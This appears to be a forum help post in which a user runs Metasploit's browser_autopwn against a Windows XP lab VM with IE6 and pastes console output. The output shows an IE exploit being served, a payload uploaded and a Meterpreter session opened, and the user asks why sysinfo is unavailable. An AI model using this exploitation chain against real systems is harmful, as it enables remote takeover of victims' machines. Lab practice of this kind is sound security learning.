hi i'm trying browser_autopwn
the target is VM with xp with explorer 6
this is what i'm getting :
..[*] --- Done, found 13 exploit modules
[*] Using URL: hxxp://[*]  Local IP: hxxp://[*] Server started.[*] Request '/' from[*] Request '/?sessid=V2luZG93czpYUDpTUDA6ZW4tdXM6eDg2Ok1TSUU6Ni4wOg%3d%3d' from[*] JavaScript Report: Windows:XP:SP0:en-us:x86:MSIE:6.0:[*] Responding with exploits[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to[*] Sending EXE payload to[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (723467 bytes)...[*] Upload completed.[*] Meterpreter session 1 opened ( ->

msf auxiliary(browser_autopwn) > sessions

Active sessions

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter ->

msf auxiliary(browser_autopwn) > sessions -i 1[*] Starting interaction with 1...

meterpreter > help

Core Commands

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel
meterpreter >
but in the metasploit-unleashed manual i see them running sysinfo and getting windows shell but i can't